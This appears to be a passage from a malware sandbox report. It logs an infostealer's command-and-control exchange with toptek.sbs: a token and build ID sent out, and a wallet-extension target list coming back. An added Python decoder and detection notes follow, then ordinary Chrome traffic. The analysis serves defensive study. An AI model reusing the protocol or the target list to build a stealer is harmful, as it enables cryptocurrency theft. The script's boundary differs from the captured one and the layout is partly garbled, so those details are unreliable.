User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 489
Connection: Keep-Alive
Cache-Control: no-cache

2024-12-23 05:21:34 UTC | 489 bytes | OUT
Data Raw: 2d 2d 2d 2d 2d 2d 5a 35 58 4c 36 58 54 52 49 35 38 51 49 45 4b 46 4b 46 43 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 36 63 39 39 62 34 65 61 31 31 30 37 64 36 37 37 38 31 65 31 33 32 62 32 39 36 63 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 5a 35 58 4c 36 58 54 52 49 35 38 51 49 45 4b 46 4b 46 43 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 5a 35 58 4c 36 58 54 52 49 35 38 51 49 45 4b 46 4b 46 43 54 0d 0a 43 6f 6e 74
Data Ascii (multipart body, CRLF line breaks restored from the hex; the dump is truncated by the report after "Cont"):
------Z5XL6XTRI58QIEKFKFCT
Content-Disposition: form-data; name="token"

a66c99b4ea1107d67781e132b296cd32
------Z5XL6XTRI58QIEKFKFCT
Content-Disposition: form-data; name="build_id"

dadb5e51ebe3ba12afb7fbe624d12a2b
------Z5XL6XTRI58QIEKFKFCT
Cont

2024-12-23 05:21:35 UTC | 158 bytes | IN
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:21:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close

2024-12-23 05:21:35 UTC | 12 bytes | IN
Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii (chunked body: a 2-byte chunk "ok" followed by the terminating 0 chunk):
2
ok
0
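The four Dry.com sessions above follow one pattern: a multipart/form-data POST to toptek.sbs carrying the same token and build_id values every time, answered in sessions 4 and 5 with a chunked body holding a base64 string that decodes to a '|'-separated list (session 5 decodes to MetaMask|1|webextension@metamask.io|Ronin Wallet|1|ronin-wallet@axieinfinity.com|, the Firefox add-on IDs of two wallet extensions; the longer session 4 list pairs the same kind of names with Chromium extension IDs), and in sessions 6 and 7 with the two-byte chunked payload "ok". The script below is an added example written for this report; it is not code from the report or from the sample. It parses the request body, reassembles the chunked responses and decodes the list. The session 5 response and the "ok" bodies are transcribed from the hex dumps above; the request body is reconstructed from the truncated dump (the page stops after the build_id part, so only those two parts are reproduced and a closing delimiter is added, which is an assumption). The three-fields-per-record grouping is an observation from these two responses, not a documented part of the protocol.

```python
"""Decode the Dry.com <-> toptek.sbs exchange shown above.

Added example for this report; not code from the report or from the sample.
Captured bytes are transcribed from the 'Data Raw' hex dumps; anything marked
'constructed' fills in where the page truncates the dump.
"""
import base64
import re
from typing import Dict, List

# Session 5 response body, transcribed verbatim from the 119-byte IN dump (captured).
RESPONSE_BODY = bytes.fromhex(" ".join([
    "36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38",
    "4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70",
    "62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75",
    "61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73",
    "62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74",
    "64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70",
    "62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38",
    "0d 0a 30 0d 0a 0d 0a",
]))

# Sessions 6 and 7 response body, transcribed from the 12-byte IN dump (captured).
ACK_BODY = bytes.fromhex("32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a")

# Request body: the dump on the page stops after the build_id part, so the two visible
# parts are reproduced here and a closing delimiter is appended (constructed, not captured).
BOUNDARY = b"----OP8QIECJ5XBIM7Y5XBAI"


def multipart_part(boundary: bytes, name: bytes, value: bytes) -> bytes:
    """One form-data part as the sample emits it: delimiter, disposition, blank line, value."""
    return b"".join([
        b"--", boundary, b"\r\n",
        b'Content-Disposition: form-data; name="', name, b'"\r\n\r\n',
        value, b"\r\n",
    ])


REQUEST_BODY = (
    multipart_part(BOUNDARY, b"token", b"a66c99b4ea1107d67781e132b296cd32")
    + multipart_part(BOUNDARY, b"build_id", b"dadb5e51ebe3ba12afb7fbe624d12a2b")
    + b"--" + BOUNDARY + b"--\r\n"
)


def parse_multipart(body: bytes, boundary: bytes) -> Dict[str, str]:
    """Return {field name: value} for a multipart/form-data body (text parts only)."""
    fields: Dict[str, str] = {}
    for part in body.split(b"--" + boundary)[1:]:
        if part.startswith(b"--"):          # "--boundary--" closes the body
            break
        head, _, value = part.partition(b"\r\n\r\n")
        match = re.search(rb'name="([^"]+)"', head)
        if match:
            fields[match.group(1).decode()] = value.rstrip(b"\r\n").decode(errors="replace")
    return fields


def dechunk(body: bytes) -> bytes:
    """Reassemble an HTTP/1.1 chunked transfer-encoded body into the payload bytes."""
    out = bytearray()
    pos = 0
    while True:
        eol = body.index(b"\r\n", pos)
        size = int(body[pos:eol].split(b";", 1)[0], 16)   # ignore chunk extensions
        pos = eol + 2
        if size == 0:                                       # last-chunk marker
            break
        out += body[pos:pos + size]
        pos += size + 2                                     # skip the CRLF after chunk data
    return bytes(out)


def decode_task_list(body: bytes, width: int) -> List[List[str]]:
    """Dechunk, base64-decode and split the '|'-separated list into records of `width` fields.

    `width` is an observation from the captured responses (3 fields per record in the
    session 5 list: name, flag, add-on id), not a documented part of the protocol.
    """
    text = base64.b64decode(dechunk(body)).decode()
    fields = text.rstrip("|").split("|")
    if len(fields) % width:
        raise ValueError(f"{len(fields)} fields do not split into records of {width}")
    return [fields[i:i + width] for i in range(0, len(fields), width)]


if __name__ == "__main__":
    print("request fields :", parse_multipart(REQUEST_BODY, BOUNDARY))
    print("session 5 list :", decode_task_list(RESPONSE_BODY, 3))
    print("session 6/7 ack:", dechunk(ACK_BODY))
```

Running it against the captured bytes yields the two request fields, the two wallet records from session 5, and b"ok" for sessions 6 and 7. For detection, note that the token and build_id values are identical across all four sessions, and that a Windows process sends a macOS Opera User-Agent; both are observable on the wire without decrypting the payload.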


Session ID 8 | Source 192.168.2.4:49754 | Destination 142.250.181.132:443 | PID 3808 | Process C:\Program Files\Google\Chrome\Application\chrome.exe

2024-12-23 05:21:37 UTC | 607 bytes | OUT
GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
Host: www.google.com
Connection: keep-alive
X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

2024-12-23 05:21:38 UTC | 1266 bytes | IN
HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 05:21:38 GMT
Pragma: no-cache
Expires: -1
Cache-Control: no-cache, must-revalidate
Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                  Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-9O1WlymOi8V4G74_7Od_4Q' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                  Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                  Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                  Server: gws
                                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
2024-12-23 05:21:38 UTC | 124 | IN | Data
Data Ascii: 6a6)]}'["",["sonic the hedgehog 3 movie box office","walker buehler","winter weather advisory","ursid meteor shower","pal
2024-12-23 05:21:38 UTC | 1390 | IN | Data
Data Ascii: world update","party city closing stores","gladiator ii streaming","nfl mvp odds"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10
2024-12-23 05:21:38 UTC | 195 | IN | Data
Data Ascii: SjA5Y2FaSERPOGttOFF5cE9JeEFHNXlNS1NXM1pPU2U3Z1lvT3RJWnJ0OWx1TURPTnhHVFJCQjBQcWR6R0pNdmc4OG1uU2EyRnZxUmE1bW5rZnVGZDZzNnEvYVRUOU5obWd1WTdpeVVvWGt1UG1MSUNPV1BaQjNFZ2M1N2g2MExtdHVmb25VTGFNdjh4MXhXR
2024-12-23 05:21:38 UTC | 91 | IN | Data
Data Ascii: 55mNMUFp2c3VsQkIrc09EVElQMElUNjFTR1RTeU4zS2F2d2p1bmswYTh0bmJLd1hHVUg4SVlaeDdnbjFOSG9wV2
2024-12-23 05:21:38 UTC | 1390 | IN | Data
Data Ascii: 588ZCK1lEVU5SaEJ5SklVZitsaVA4NmFncEdwQThoSVdzK1Z3aWtmMXRwR3MzdldjOFYyaEluWXRCSnU3SWdCd01lV01qSTh5Zk9ubFFOZFJxNnJkVHNYdWQ3S0MyU1F1N3Urenc5cWtsa3dGZHFpR0xPejBzTFNlbnRQMDZKUmVYMDBFckhzaUZTV1BvQWVLTGRNbE1MQ0JyMlNlTWNnekxoaG51cVN4M1NqNWlvQm5qZGp2cWxkTmk5UkVP
2024-12-23 05:21:38 UTC | 33 | IN | Data
Data Ascii: ERY","QUERY","QUERY","QUERY"]}]
2024-12-23 05:21:38 UTC | 5 | IN | Data
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49755 | 142.250.181.132 | 443 | 3808 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:21:38 UTC | 510 | OUT | GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
Host: www.google.com
Connection: keep-alive
X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-12-23 05:21:39 UTC | 1018 | IN | HTTP/1.1 200 OK
Version: 705503573
Content-Type: application/json; charset=UTF-8
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
Accept-CH: Sec-CH-Prefers-Color-Scheme
Accept-CH: Sec-CH-UA-Form-Factors
Accept-CH: Sec-CH-UA-Platform
Accept-CH: Sec-CH-UA-Platform-Version
Accept-CH: Sec-CH-UA-Full-Version
Accept-CH: Sec-CH-UA-Arch
Accept-CH: Sec-CH-UA-Model
Accept-CH: Sec-CH-UA-Bitness
Accept-CH: Sec-CH-UA-Full-Version-List
Accept-CH: Sec-CH-UA-WoW64
Permissions-Policy: unload=()
Content-Disposition: attachment; filename="f.txt"
Date: Mon, 23 Dec 2024 05:21:38 GMT
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
2024-12-23 05:21:39 UTC | 372 | IN | Data
Data Ascii: 1794)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:39 UTC1390INData Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30
                                                                                                                                                                                                                                                                                  Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:39 UTC1390INData Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64
                                                                                                                                                                                                                                                                                  Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:39 UTC1390INData Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20
                                                                                                                                                                                                                                                                                  Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:39 UTC1390INData Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c
                                                                                                                                                                                                                                                                                  Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:39 UTC112INData Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 32 32 2c 33 37 30 31 33 38 34 2c 31 30 32 32 37 38 32 30 35 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 0d 0a
                                                                                                                                                                                                                                                                                  Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700322,3701384,102278205],"is_backup_bar":false},"p
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:39 UTC274INData Raw: 31 30 62 0d 0a 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 5c 75 30 30 33 64 74 68 69 73 3b 5c 6e 74 72 79 7b 5c 6e 5f 2e 78 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 21 61 2e 6a 29 69 66 28 63 20 69 6e 73 74 61 6e 63 65 6f 66 20 41 72 72 61 79 29 66 6f 72 28 76 61 72 20 64 20 6f 66 20 63 29 5f 2e 78 64 28 61 2c 62 2c 64 29 3b 65 6c 73
                                                                                                                                                                                                                                                                                  Data Ascii: 10bage_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_||{};(function(_){var window\u003dthis;\ntry{\n_.xd\u003dfunction(a,b,c){if(!a.j)if(c instanceof Array)for(var d of c)_.xd(a,b,d);els
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:39 UTC1390INData Raw: 38 30 30 30 0d 0a 61 2e 43 2c 61 2c 62 29 3b 63 6f 6e 73 74 20 65 5c 75 30 30 33 64 61 2e 76 2b 63 3b 61 2e 76 2b 2b 3b 62 2e 64 61 74 61 73 65 74 2e 65 71 69 64 5c 75 30 30 33 64 65 3b 61 2e 42 5b 65 5d 5c 75 30 30 33 64 64 3b 62 5c 75 30 30 32 36 5c 75 30 30 32 36 62 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 62 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 63 2c 64 2c 21 31 29 3a 62 5c 75 30 30 32 36 5c 75 30 30 32 36 62 2e 61 74 74 61 63 68 45 76 65 6e 74 3f 62 2e 61 74 74 61 63 68 45 76 65 6e 74 28 5c 22 6f 6e 5c 22 2b 63 2c 64 29 3a 61 2e 6f 2e 6c 6f 67 28 45 72 72 6f 72 28 5c 22 42 60 5c 22 2b 62 29 29 7d 7d 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e
                                                                                                                                                                                                                                                                                  Data Ascii: 8000a.C,a,b);const e\u003da.v+c;a.v++;b.dataset.eqid\u003de;a.B[e]\u003dd;b\u0026\u0026b.addEventListener?b.addEventListener(c,d,!1):b\u0026\u0026b.attachEvent?b.attachEvent(\"on\"+c,d):a.o.log(Error(\"B`\"+b))}};\n}catch(e){_._DumpException(e)}\ntry{\n
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:39 UTC1390INData Raw: 74 68 69 73 2e 6e 68 5c 75 30 30 33 64 61 7d 7d 3b 5f 2e 4b 64 5c 75 30 30 33 64 5b 47 64 28 5c 22 64 61 74 61 5c 22 29 2c 47 64 28 5c 22 68 74 74 70 5c 22 29 2c 47 64 28 5c 22 68 74 74 70 73 5c 22 29 2c 47 64 28 5c 22 6d 61 69 6c 74 6f 5c 22 29 2c 47 64 28 5c 22 66 74 70 5c 22 29 2c 6e 65 77 20 5f 2e 46 64 28 61 5c 75 30 30 33 64 5c 75 30 30 33 65 2f 5e 5b 5e 3a 5d 2a 28 5b 2f 3f 23 5d 7c 24 29 2f 2e 74 65 73 74 28 61 29 29 5d 3b 5f 2e 4c 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 2b 5c 22 5c 22 7d 7d 3b 5f 2e 4d 64 5c 75 30 30 33 64 6e 65 77 20 5f 2e 4c 64 28 5f 2e 48 64 3f 5f 2e 48 64 2e 65 6d 70 74
                                                                                                                                                                                                                                                                                  Data Ascii: this.nh\u003da}};_.Kd\u003d[Gd(\"data\"),Gd(\"http\"),Gd(\"https\"),Gd(\"mailto\"),Gd(\"ftp\"),new _.Fd(a\u003d\u003e/^[^:]*([/?#]|$)/.test(a))];_.Ld\u003dclass{constructor(a){this.i\u003da}toString(){return this.i+\"\"}};_.Md\u003dnew _.Ld(_.Hd?_.Hd.empt
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:39 UTC1390INData Raw: 5c 75 30 30 33 64 6e 75 6c 6c 3f 5c 22 5c 22 3a 62 2e 6e 6f 6e 63 65 7c 7c 62 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5c 22 6e 6f 6e 63 65 5c 22 29 7c 7c 5c 22 5c 22 7d 3b 5c 6e 5f 2e 24 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 5c 75 30 30 33 64 5f 2e 4d 61 28 61 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 61 72 72 61 79 5c 22 7c 7c 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6f 62 6a 65 63 74 5c 22 5c 75 30 30 32 36 5c 75 30 30 32 36 74 79 70 65 6f 66 20 61 2e 6c 65 6e 67 74 68 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6e 75 6d 62 65 72 5c 22 7d 3b 5f 2e 61 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 72 65 74 75 72 6e 20 5f 2e 73 62 28 61 2c 62 2c 63 2c 21 31 29 21 5c
                                                                                                                                                                                                                                                                                  Data Ascii: \u003dnull?\"\":b.nonce||b.getAttribute(\"nonce\")||\"\"};\n_.$d\u003dfunction(a){var b\u003d_.Ma(a);return b\u003d\u003d\"array\"||b\u003d\u003d\"object\"\u0026\u0026typeof a.length\u003d\u003d\"number\"};_.ae\u003dfunction(a,b,c){return _.sb(a,b,c,!1)!\


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
10          192.168.2.4  49756        142.250.181.132  443               3808  C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-23 05:21:38 UTC  353                OUT        GET /async/newtab_promos HTTP/1.1
                                                       Host: www.google.com
                                                       Connection: keep-alive
                                                       Sec-Fetch-Site: cross-site
                                                       Sec-Fetch-Mode: no-cors
                                                       Sec-Fetch-Dest: empty
                                                       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                       Accept-Encoding: gzip, deflate, br
                                                       Accept-Language: en-US,en;q=0.9
2024-12-23 05:21:39 UTC  933                IN         HTTP/1.1 200 OK
                                                       Version: 705503573
                                                       Content-Type: application/json; charset=UTF-8
                                                       X-Content-Type-Options: nosniff
                                                       Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                       Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                       Accept-CH: Sec-CH-UA-Form-Factors
                                                       Accept-CH: Sec-CH-UA-Platform
                                                       Accept-CH: Sec-CH-UA-Platform-Version
